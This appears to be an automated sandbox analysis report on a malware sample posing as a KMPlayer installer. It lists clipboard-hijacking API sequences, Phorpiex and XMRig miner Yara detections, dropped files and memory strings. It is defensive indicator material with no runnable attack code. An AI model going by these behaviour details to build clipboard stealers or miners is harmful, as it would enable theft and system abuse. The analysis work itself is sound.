Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000011.00000003.1748676169.000001A6A435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfom
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com1
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Code function: 4_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,

4_2_00405970

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	4_2_00404970
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00404970
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	7_2_00404970

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

4_2_00405970

Source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_744460ad-9

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

4_2_00405970

Source: Yara match	File source: 9.3.2779421088.exe.35a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.2779421088.exe.3380000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.svchost.exe.50e0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.svchost.exe.50e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.svchost.exe.4ec0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2779421088.exe PID: 8088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8108, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	4_2_0040D4A0
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040F0B1 NtQueryVirtualMemory,	4_2_0040F0B1
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	5_2_0040D4A0
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040F0B1 NtQueryVirtualMemory,	5_2_0040F0B1
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	7_2_0040D4A0
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040F0B1 NtQueryVirtualMemory,	7_2_0040F0B1
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 12_2_00000270F6671AA4 NtAcceptConnectPort,NtAcceptConnectPort,	12_2_00000270F6671AA4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 12_2_00000270F6671CF4 NtAcceptConnectPort,CloseHandle,	12_2_00000270F6671CF4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 12_2_00000270F66715C0 NtAcceptConnectPort,	12_2_00000270F66715C0
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 12_2_00000270F6670AC8 NtAcceptConnectPort,NtAcceptConnectPort,	12_2_00000270F6670AC8
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE1F3F40 NtClose,	32_2_00007FF6CE1F3F40

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

File created: C:\Windows\sysnldcvmr.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040EE74	4_2_0040EE74
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00404090	4_2_00404090
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00407B49	4_2_00407B49
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00404970	4_2_00404970
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040A500	4_2_0040A500
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00407B20	4_2_00407B20
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040EE74	5_2_0040EE74
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00404090	5_2_00404090
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00407B49	5_2_00407B49
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00404970	5_2_00404970
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040A500	5_2_0040A500
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00407B20	5_2_00407B20
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040EE74	7_2_0040EE74
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00404090	7_2_00404090
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00407B49	7_2_00407B49
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00404970	7_2_00404970
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040A500	7_2_0040A500
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00407B20	7_2_00407B20
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F781D2	9_2_00F781D2
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F6C231	9_2_00F6C231
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F6C400	9_2_00F6C400
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 12_2_00000270F6670C70	12_2_00000270F6670C70
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E306B	24_2_009E306B
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E3914	24_2_009E3914
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E3D20	24_2_009E3D20
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E3540	24_2_009E3540
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E4140	24_2_009E4140
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E9D69	24_2_009E9D69
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E46F0	24_2_009E46F0
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE2085C0	32_2_00007FF6CE2085C0
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE206D80	32_2_00007FF6CE206D80
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE1F7190	32_2_00007FF6CE1F7190
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE203DE0	32_2_00007FF6CE203DE0

Source: C:\Windows\System32\conhost.exe	Code function: String function: 00007FF6CE1F3F40 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: String function: 00F6CD90 appears 33 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444

Source: 2688734187.exe.11.dr	Static PE information: Number of sections : 11 > 10
Source: winupsecvmgr.exe.18.dr	Static PE information: Number of sections : 11 > 10
Source: nxmr[1].exe.11.dr	Static PE information: Number of sections : 11 > 10

Source: f5TWdT5EAc.exe, 00000000.00000000.1311814537.0000000004A2F000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameKMPlayer_4.2.2.13.exe< vs f5TWdT5EAc.exe

Source: f5TWdT5EAc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
